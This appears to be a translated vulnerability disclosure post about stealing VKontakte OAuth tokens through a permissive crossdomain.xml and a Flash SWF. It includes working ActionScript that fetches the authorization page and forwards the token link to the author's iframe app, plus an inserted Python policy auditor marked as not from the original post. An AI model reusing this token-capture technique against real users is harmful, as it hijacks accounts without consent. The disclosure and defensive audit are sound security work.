Getting access to VKontakte API methods without the user's knowledge


I found this vulnerability about two months ago, or even earlier.
I then sent the information to the developers, and they fixed it successfully.
Or so it seemed to me at the time.

It soon became clear that they had not fixed it at all, but had simply restricted access to messages, which is what I had drawn the developers' attention to at the time.

I will try to describe the process of gaining access in sufficient detail below.


Actually, the idea that the API could be accessed without the user's knowledge came to me almost immediately, as soon as I started working with the methods for Standalone applications.
At that point VKontakte was already using OAuth authorization.

There was nothing particularly tricky about it: OAuth authorization lived on the same domain as API 2.0, and therefore under the same crossdomain.xml file, which allows requests to be made from any server.

Without hesitation, I began to write an implementation.


I should warn readers about two things straight away:
  • My approach may seem a little strange.
  • My code is rather crude, but unfortunately I don't know how to do it any other way.

My cunning plan was that the user would be sent to a Flash application, which would request the authorization page and then parse out the authorization link.


Point one - the Flash application.

Since Flash applications can freely make cross-domain requests wherever there is a suitable crossdomain.xml, this was the only way to reliably obtain the authorization link.
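The whole attack rests on that one policy file, so the check a defender wants is an audit of crossdomain.xml for the host that serves the OAuth endpoint. The following is an added example, not code from the original post; the two policy documents are constructed samples (the permissive one mirrors the situation described, the strict one a corrected policy), and the host and endpoint names are taken from the URLs in the post.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample (not the real file VK served): a policy that lets a SWF from
# any origin read responses from this host, which is what made the attack work.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
"""

# Constructed sample of a corrected policy: only the site's own host may read responses.
STRICT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="vk.com" secure="true" />
</cross-domain-policy>
"""

def audit_crossdomain(policy_xml, policy_host, oauth_endpoint):
    """Return a list of findings for a Flash crossdomain.xml served by policy_host.

    oauth_endpoint is the OAuth authorization URL. If it is served by the same
    host as a wildcard policy, a SWF loaded from any origin can read the
    authorization response, including the token in its redirect URL.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["not a cross-domain-policy document"]
    wildcard = False
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*" or domain.startswith("*."):
            wildcard = True
            findings.append(f"wildcard allow-access-from domain={domain!r}")
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" on domain={domain!r}: HTTP-loaded SWFs may read HTTPS responses')
    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            findings.append("any origin may send arbitrary request headers")
    if wildcard and urlsplit(oauth_endpoint).hostname == policy_host:
        findings.append("OAuth authorization endpoint shares host with wildcard policy: "
                        "authorization response readable cross-origin")
    return findings

if __name__ == "__main__":
    endpoint = "http://api.vkontakte.ru/oauth/authorize"
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("strict", STRICT_POLICY)):
        print(name, audit_crossdomain(policy, "api.vkontakte.ru", endpoint))
```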

The Flash code is simple, and yet it was perhaps the hardest part, at least for me, because I barely know ActionScript.

import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.events.Event;

var auth_page:URLLoader = new URLLoader();
this.addEventListener(Event.ADDED_TO_STAGE, onAddedToStage);

function onAddedToStage(e:Event):void {
    auth_page.addEventListener(Event.COMPLETE, auth_load);
    // Fetch the authorization page
    auth_page.load(new URLRequest('http://api.vkontakte.ru/oauth/authorize?client_id=2725857&scope=offline,ads,notifications,groups,wall,questions,offers,pages,notes,docs,video,audio,photos,friends,notifi&redirect_uri=http://api.vk.com/blank.html&display=page&response_type=token'));
}

function auth_load(e:Event):void {
    var wrapper:Object = Object(parent.parent);
    var auth_str:String = auth_page.data;
    // Redirect the user to the iframe application, passing the parsed URL in the hash
    wrapper.external.navigateToURL(new URLRequest('http://vkontakte.ru/app2725881#' + auth_str.substr(auth_str.indexOf("location.href") + 17, 162)));
}

There is one small trick here.
A Flash application cannot redirect the browser itself, because of browser security policies.
But VK has, or rather had (it has since been removed from the docs), a special method for redirecting the user to a page inside VKontakte.
This was not a real obstacle, though, because there are iframe applications, which can redirect wherever they like.

Point two - the iframe application.

In the iframe application we just need to redirect the user to the URL we were given, after making a couple of substitutions.

This can be done.
On the hi.php page we receive the access_token, with rights to all methods except messages.

A working example can be seen here.
Thanks for your attention.
UPD: The fix has been made, though rather cleverly.
The example no longer works.
